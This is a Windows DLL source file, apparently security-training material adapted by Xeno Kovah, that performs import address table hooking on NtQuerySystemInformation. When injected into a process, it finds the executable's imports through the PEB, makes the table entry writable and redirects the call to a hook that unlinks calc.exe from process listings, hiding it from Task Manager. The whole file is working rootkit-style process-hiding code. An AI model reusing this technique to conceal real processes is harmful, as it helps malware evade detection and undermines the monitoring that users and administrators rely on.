//Modified by Xeno Kovah from code here:
//http://www.codeproject.com/KB/vista/api-hooks.aspx
//changed to perform IAT hooking instead of inline hooking
//Mostly I just wanted the modified NtQuerySystemInformation
//which hides calc.exe from the runnning processes list
//as far as taskmgr.exe is concerned.

#include "stdafx.h"
//#include "mhook/mhook-lib/mhook.h"

unsigned int * globalVaOfHookedFunctionIATEntry;
unsigned int globalValueOfHookedFunctionIATEntry;

//////////////////////////////////////////////////////////////////////////
// Defines and typedefs

#define STATUS_SUCCESS  ((NTSTATUS)0x00000000L)

typedef struct _MY_SYSTEM_PROCESS_INFORMATION 
{
    ULONG                   NextEntryOffset;
    ULONG                   NumberOfThreads;
    LARGE_INTEGER           Reserved[3];
    LARGE_INTEGER           CreateTime;
    LARGE_INTEGER           UserTime;
    LARGE_INTEGER           KernelTime;
    UNICODE_STRING          ImageName;
    ULONG                   BasePriority;
    HANDLE                  ProcessId;
    HANDLE                  InheritedFromProcessId;
} MY_SYSTEM_PROCESS_INFORMATION, *PMY_SYSTEM_PROCESS_INFORMATION;

typedef NTSTATUS (WINAPI *PNT_QUERY_SYSTEM_INFORMATION)(
    __in       SYSTEM_INFORMATION_CLASS SystemInformationClass,
    __inout    PVOID SystemInformation,
    __in       ULONG SystemInformationLength,
    __out_opt  PULONG ReturnLength
    );

//////////////////////////////////////////////////////////////////////////
// Original function

PNT_QUERY_SYSTEM_INFORMATION OriginalNtQuerySystemInformation = 
    (PNT_QUERY_SYSTEM_INFORMATION)::GetProcAddress(::GetModuleHandleA("ntdll"), "NtQuerySystemInformation");

//////////////////////////////////////////////////////////////////////////
// Hooked function

NTSTATUS WINAPI HookedNtQuerySystemInformation(
    __in       SYSTEM_INFORMATION_CLASS SystemInformationClass,
    __inout    PVOID                    SystemInformation,
    __in       ULONG                    SystemInformationLength,
    __out_opt  PULONG                   ReturnLength
    )
{
    NTSTATUS status = OriginalNtQuerySystemInformation(SystemInformationClass,
        SystemInformation,
        SystemInformationLength,
        ReturnLength);

    if (SystemProcessInformation == SystemInformationClass && STATUS_SUCCESS == status)
    {
        //
        // Loop through the list of processes
        //

        PMY_SYSTEM_PROCESS_INFORMATION pCurrent = NULL;
        PMY_SYSTEM_PROCESS_INFORMATION pNext    = (PMY_SYSTEM_PROCESS_INFORMATION)SystemInformation;
        
        do
        {
            pCurrent = pNext;
            pNext    = (PMY_SYSTEM_PROCESS_INFORMATION)((PUCHAR)pCurrent + pCurrent->NextEntryOffset);

            if (!wcsncmp(pNext->ImageName.Buffer, L"calc.exe", pNext->ImageName.Length))
            {
                if (0 == pNext->NextEntryOffset)
                {
                    pCurrent->NextEntryOffset = 0;
                }
                else
                {
                    pCurrent->NextEntryOffset += pNext->NextEntryOffset;
                }

                pNext = pCurrent;
            }            
        } 
        while(pCurrent->NextEntryOffset != 0);
    }

    return status;
}

//References: http://www.openrce.org/reference_library/files/reference/Windows%20Memory%20Layout,%20User-Kernel%20Address%20Spaces.pdf
//http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx
//Start at fs:[0] which always points at the beginning of the
//Thread Environment Block (TEB) for Windows processes
//From there, offset 0x30 is the offset to the pointer to the 
//Process Envionment Block (PEB)
//From there, offset 0xC is the offset to the pointer to the
//PEB_LDR_DATA linked list, which has elements for each of
//the loaded DLLs as well as the main process
//Offset 0xC is a LIST_ENTRY (not a pointer to one) called 
//InMemoryOrderModuleList. We're just going to assume that the 
//first element (the one pointed to by the forward link (flink) 
//of the first LIST_ENTRY in the PEB_LDR_DATA.InMemoryOrderModuleList 
//is the pointer to the LDR_DATA_TABLE_ENTRY entry for the main 
//executable this code will be running in the context of.
//Offset 0x18 is the DllBase field of the LDR_DATA_TABLE_ENTRY
//but since we're assuming this entry is for the main executable
//the DllBase field is the base of the main executable.
__declspec( naked )unsigned int FindThisProcessBaseAddress(){
	__asm{
		mov eax, fs:[0x30];		//Get from the TEB to the PEB
		mov eax, [eax + 0xC];	//Get from the PEB to the PEB_LDR_DATA
		mov eax, [eax + 0xC];	//Get from the PEB_LDR_DATA.InMemoryOrderModuleList.Flink 
								//to the LDR_DATA_TABLE_ENTRY
		mov eax, [eax + 0x18];	//From the LDR_DATA_TABLE_ENTRY get the DllBase
		ret;
	};
}


//This function will return the absolute VA of the IAT entry for the specified 
//function name in the current process context
void HookIATEntryForNtQuerySystemInformation(){
	PIMAGE_NT_HEADERS ntHdrPtr;
	PIMAGE_IMPORT_DESCRIPTOR importDescriptorPtr;
	unsigned int exeBaseAddress, importRVA, importSize, importEndAddress;
	DWORD oldPermissions;
	unsigned int * iatEntry;
	char * importDescriptorName;

	exeBaseAddress = FindThisProcessBaseAddress();

	ntHdrPtr = (PIMAGE_NT_HEADERS)(exeBaseAddress + ((PIMAGE_DOS_HEADER)exeBaseAddress)->e_lfanew);
	importRVA = ntHdrPtr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
	importSize = ntHdrPtr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size;
	importEndAddress = exeBaseAddress + importRVA + importSize;
	importDescriptorPtr = (PIMAGE_IMPORT_DESCRIPTOR)(exeBaseAddress + importRVA);

	//There are as many IMAGE_IMPORT_DESCRIPTORs in an array as will fit in DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size
	importDescriptorName = (char *)(exeBaseAddress + importDescriptorPtr->Name);
	while(_strnicmp(importDescriptorName, "ntdll.dll", 10)){
		importDescriptorPtr++;
		importDescriptorName = (char *)(exeBaseAddress + importDescriptorPtr->Name);
		//Check whether we've walked to the end of the array
		if((unsigned int) importDescriptorPtr == importEndAddress){
			return; //error out
		}
	}

	//If we get here, we're pointing at the IMAGE_IMPORT_DESCRIPTOR for ntdll.dll
	//for which the FirstThunk field is the RVA of the first entry in the IAT which
	//is imported from ntdll.dll
	iatEntry = (unsigned int *)(exeBaseAddress + importDescriptorPtr->FirstThunk);
	//Loop forward until we get to a NULL
	while(*iatEntry){
		if(*iatEntry == (unsigned int)(OriginalNtQuerySystemInformation)){
			break;
		}
		iatEntry++;
	}
	if(*iatEntry == NULL){
		return;
	}

	//If we get here, then the iatEntry holds the absolute VA which has the
	//address of NtQuerySystemInformation(). We want to make a copy of this address
	//and this value, so we can replace them if we remove this DLL from memory
	globalVaOfHookedFunctionIATEntry = iatEntry;
	globalValueOfHookedFunctionIATEntry = *iatEntry;

	//Since we've found the IAT entry we want to modify, we need to make sure it is writable
	if(!VirtualProtect((unsigned int *)(((unsigned int)iatEntry) & 0xFFFFF000), 0x1000, PAGE_EXECUTE_READWRITE, &oldPermissions)){
		return;//VirtualProtect failed, so don't try to write to the memory, just error out
	}

	//Now we want to replace the iatEntry with the address of HookedNtQuerySystemInformation
	*iatEntry = (unsigned int)(HookedNtQuerySystemInformation);

	//voila! h00x0r3d
}

void UnookIATEntryForNtQuerySystemInformation(){
	//Just put the values back (this is why we stored them)
	*globalVaOfHookedFunctionIATEntry = globalValueOfHookedFunctionIATEntry;
}

//////////////////////////////////////////////////////////////////////////
// Entry point

BOOL WINAPI DllMain(
    __in HINSTANCE  hInstance,
    __in DWORD      Reason,
    __in LPVOID     Reserved
    )
{        
    switch (Reason)
    {
    case DLL_PROCESS_ATTACH:
		HookIATEntryForNtQuerySystemInformation();	
        break;
	}

    return TRUE;
}